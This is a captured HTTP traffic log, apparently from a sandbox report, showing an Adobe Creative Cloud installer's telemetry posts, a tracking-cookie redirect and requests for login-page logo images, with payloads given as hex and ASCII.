2023-10-04 16:43:15 UTC	5079	IN	HTTP/1.1 302 Found Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://auth.services.adobe.com Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private DCS: dcs-prod-usw2-1-v047-0628159bb.edge-usw2.demdex.com 0 ms Expires: Thu, 01 Jan 1970 00:00:00 UTC Location: https://dpm.demdex.net/id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261 P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT" Pragma: no-cache set-cookie: demdex=86072171691128452991944543401542351402; Max-Age=15552000; Expires=Mon, 01 Apr 2024 16:43:15 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains Vary: Origin X-TID: Kp1UA4TdSTw= Content-Length: 0 Connection: Close

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:43:15 UTC	5080	OUT	POST /hsmessaging/rest HTTP/1.1 Connection: close Content-Type: text/xml User-Agent: Creative Cloud Content-Length: 2646 Host: na1e-acc.services.adobe.com
2023-10-04 16:43:15 UTC	5081	OUT	Data Raw: 3c 65 76 65 6e 74 4c 69 73 74 3e 3c 48 6f 73 74 65 64 53 65 72 76 69 63 65 73 45 76 65 6e 74 3e 3c 65 76 65 6e 74 47 75 69 64 3e 62 31 34 65 62 31 62 37 2d 64 33 32 39 2d 34 64 33 64 2d 38 30 34 31 2d 31 32 39 31 65 34 33 38 66 63 66 34 3c 2f 65 76 65 6e 74 47 75 69 64 3e 3c 65 76 65 6e 74 44 74 73 3e 32 30 32 33 2d 31 30 2d 30 34 54 32 30 3a 31 36 3a 34 37 2e 37 30 37 2b 30 32 3a 30 30 3c 2f 65 76 65 6e 74 44 74 73 3e 3c 65 76 65 6e 74 43 6f 64 65 3e 41 43 43 43 5f 53 45 52 56 49 43 45 3c 2f 65 76 65 6e 74 43 6f 64 65 3e 3c 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 4e 55 4c 4c 5f 53 55 42 5f 43 4f 44 45 3c 2f 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 3c 65 76 65 6e 74 53 6f 75 72 63 65 3e 61 63 63 63 2e 61 63 63 63 5f 63 6c 69 65 6e 74 2e 32 2e 37 2e 30 2e 31 Data Ascii: <eventList><HostedServicesEvent><eventGuid>b14eb1b7-d329-4d3d-8041-1291e438fcf4</eventGuid><eventDts>2023-10-04T20:16:47.707+02:00</eventDts><eventCode>ACCC_SERVICE</eventCode><eventSubCode>NULL_SUB_CODE</eventSubCode><eventSource>accc.accc_client.2.7.0.1
2023-10-04 16:43:15 UTC	5089	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:43:15 GMT Content-Length: 165 Connection: close X-Request-ID: 17fde9b3-9283-486c-965c-e38478dd891f
2023-10-04 16:43:15 UTC	5089	IN	Data Raw: 3c 45 76 65 6e 74 4c 69 73 74 41 63 6b 20 64 74 73 3d 22 32 30 32 33 2d 31 30 2d 30 34 54 31 36 3a 34 33 3a 31 35 2e 30 30 30 2b 30 30 3a 30 30 22 20 65 6c 61 70 73 65 64 4d 69 6c 6c 69 73 3d 22 31 38 2e 30 22 20 65 76 65 6e 74 43 6f 75 6e 74 3d 22 31 22 3e 0a 20 20 3c 45 76 65 6e 74 41 63 6b 20 65 76 65 6e 74 47 75 69 64 3d 22 62 31 34 65 62 31 62 37 2d 64 33 32 39 2d 34 64 33 64 2d 38 30 34 31 2d 31 32 39 31 65 34 33 38 66 63 66 34 22 2f 3e 0a 3c 2f 45 76 65 6e 74 4c 69 73 74 41 63 6b 3e Data Ascii: <EventListAck dts="2023-10-04T16:43:15.000+00:00" elapsedMillis="18.0" eventCount="1"> <EventAck eventGuid="b14eb1b7-d329-4d3d-8041-1291e438fcf4"/></EventListAck>

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:42:56 UTC	6	OUT	POST /hsmessaging/rest HTTP/1.1 Connection: close Content-Type: text/xml User-Agent: Creative Cloud Content-Length: 2642 Host: na1e-acc.services.adobe.com
2023-10-04 16:42:56 UTC	6	OUT	Data Raw: 3c 65 76 65 6e 74 4c 69 73 74 3e 3c 48 6f 73 74 65 64 53 65 72 76 69 63 65 73 45 76 65 6e 74 3e 3c 65 76 65 6e 74 47 75 69 64 3e 63 31 66 30 66 62 39 35 2d 37 30 35 62 2d 34 63 36 38 2d 39 31 61 30 2d 36 37 37 33 35 63 66 39 35 37 61 63 3c 2f 65 76 65 6e 74 47 75 69 64 3e 3c 65 76 65 6e 74 44 74 73 3e 32 30 32 33 2d 31 30 2d 30 34 54 32 30 3a 31 36 3a 32 38 2e 33 36 31 2b 30 32 3a 30 30 3c 2f 65 76 65 6e 74 44 74 73 3e 3c 65 76 65 6e 74 43 6f 64 65 3e 41 43 43 43 5f 53 45 52 56 49 43 45 3c 2f 65 76 65 6e 74 43 6f 64 65 3e 3c 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 4e 55 4c 4c 5f 53 55 42 5f 43 4f 44 45 3c 2f 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 3c 65 76 65 6e 74 53 6f 75 72 63 65 3e 61 63 63 63 2e 61 63 63 63 5f 63 6c 69 65 6e 74 2e 32 2e 37 2e 30 2e 31 Data Ascii: <eventList><HostedServicesEvent><eventGuid>c1f0fb95-705b-4c68-91a0-67735cf957ac</eventGuid><eventDts>2023-10-04T20:16:28.361+02:00</eventDts><eventCode>ACCC_SERVICE</eventCode><eventSubCode>NULL_SUB_CODE</eventSubCode><eventSource>accc.accc_client.2.7.0.1
2023-10-04 16:42:56 UTC	9	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:42:56 GMT Content-Length: 165 Connection: close X-Request-ID: 2c14cc81-974b-4fcb-bc97-d135358aefde
2023-10-04 16:42:56 UTC	9	IN	Data Raw: 3c 45 76 65 6e 74 4c 69 73 74 41 63 6b 20 64 74 73 3d 22 32 30 32 33 2d 31 30 2d 30 34 54 31 36 3a 34 32 3a 35 36 2e 30 30 30 2b 30 30 3a 30 30 22 20 65 6c 61 70 73 65 64 4d 69 6c 6c 69 73 3d 22 31 38 2e 30 22 20 65 76 65 6e 74 43 6f 75 6e 74 3d 22 31 22 3e 0a 20 20 3c 45 76 65 6e 74 41 63 6b 20 65 76 65 6e 74 47 75 69 64 3d 22 63 31 66 30 66 62 39 35 2d 37 30 35 62 2d 34 63 36 38 2d 39 31 61 30 2d 36 37 37 33 35 63 66 39 35 37 61 63 22 2f 3e 0a 3c 2f 45 76 65 6e 74 4c 69 73 74 41 63 6b 3e Data Ascii: <EventListAck dts="2023-10-04T16:42:56.000+00:00" elapsedMillis="18.0" eventCount="1"> <EventAck eventGuid="c1f0fb95-705b-4c68-91a0-67735cf957ac"/></EventListAck>

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:43:15 UTC	5087	OUT	GET /img/social/apple.svg HTTP/1.1 Accept: / Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=true Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: auth.services.adobe.com Connection: Keep-Alive Cookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
2023-10-04 16:43:15 UTC	5091	IN	HTTP/1.1 200 OK Content-Type: image/svg+xml Content-Length: 751 Connection: close Date: Sun, 01 Oct 2023 23:34:36 GMT Last-Modified: Wed, 27 Sep 2023 11:38:28 GMT ETag: "a23d338c5ab2e6a2eceab9436b376308" x-amz-server-side-encryption: AES256 Cache-Control: public,max-age=604800,must-revalidate x-amz-version-id: wA.OC8vk29tX1NPRi4yYhBfxtb0OEW0W Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 8ab495d5c70152d495ba77099660f1e6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: LAX3-C3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: Tf8NU6ZrKUiGtaD7ZaPoF0rmLXdrjAizuSyrSrucgv1m5kFzkFt-Kg== Age: 234520 X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: report-uri https://adobeid-na1.services.adobe.com/renga-idprovider/pages/csp-violation-report; report-to https://adobeid-na1.services.adobe.com/renga-idprovider/pages/csp-violation-report X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload x-robots-tag: noindex
2023-10-04 16:43:15 UTC	5092	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 36 2e 30 33 34 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 36 2e 30 33 34 20 33 32 22 3e 3c 67 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 20 30 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 33 31 2e 33 35 34 2c 32 32 2e 36 30 38 61 37 2e 32 37 32 2c 37 2e 32 37 32 2c 30 2c 30 2c 31 2c 33 2e 34 36 33 2d 36 2e 31 2c 37 2e 34 34 34 2c 37 2e 34 34 34 2c 30 2c 30 2c 30 2d 35 2e 38 36 35 2d 33 2e 31 37 31 63 2d 32 2e 34 36 38 2d 2e 32 35 39 2d 34 2e 38 36 2c 31 2e 34 37 37 2d 36 2e 31 31 37 2c 31 2e 34 37 37 2d 31 2e 32 38 32 2c 30 2d 33 2e 32 31 38 2d 31 2e 34 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="26.034" height="32" viewBox="0 0 26.034 32"><g transform="translate(0 0)"><path d="M31.354,22.608a7.272,7.272,0,0,1,3.463-6.1,7.444,7.444,0,0,0-5.865-3.171c-2.468-.259-4.86,1.477-6.117,1.477-1.282,0-3.218-1.4

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:43:15 UTC	5088	OUT	GET /img/social/sml-apple-logo.svg HTTP/1.1 Accept: / Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=true Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: auth.services.adobe.com Connection: Keep-Alive Cookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
2023-10-04 16:43:15 UTC	5093	IN	HTTP/1.1 200 OK Content-Type: image/svg+xml Content-Length: 1241 Connection: close Last-Modified: Mon, 18 Sep 2023 09:29:55 GMT x-amz-server-side-encryption: AES256 x-amz-version-id: 7iQf5c5SzQaAzcOo5H09RZuXGgBGa5lJ Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 30 Sep 2023 22:38:30 GMT Cache-Control: public,max-age=604800,must-revalidate ETag: "f3d8620b91a594708b45b74945d91c5c" Vary: Accept-Encoding X-Cache: Hit from cloudfront Via: 1.1 0bc1bd7d49e301d0a79457bc9c864cd2.cloudfront.net (CloudFront) X-Amz-Cf-Pop: LAX3-C3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: h9Kj5ogrPhGmA4Y64N_Jl2masG9eEl1v6kjYbUzwjzJKYxH2FYws6Q== Age: 324286 X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: report-uri https://adobeid-na1.services.adobe.com/renga-idprovider/pages/csp-violation-report; report-to https://adobeid-na1.services.adobe.com/renga-idprovider/pages/csp-violation-report X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload x-robots-tag: noindex
2023-10-04 16:43:15 UTC	5094	IN	Data Raw: 3c 73 76 67 20 69 64 3d 22 47 72 6f 75 70 5f 31 35 35 35 30 39 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 47 72 6f 75 70 20 31 35 35 35 30 39 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 35 30 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 30 20 35 30 22 3e 0a 20 20 3c 72 65 63 74 20 69 64 3d 22 42 61 63 6b 67 72 6f 75 6e 64 22 20 77 69 64 74 68 3d 22 35 30 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 72 78 3d 22 32 35 22 2f 3e 0a 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 5f 37 34 35 38 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 47 72 6f 75 70 20 37 34 35 38 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 2e 35 Data Ascii: <svg id="Group_155509" data-name="Group 155509" xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50"> <rect id="Background" width="50" height="50" rx="25"/> <g id="Group_74582" data-name="Group 74582" transform="translate(14.5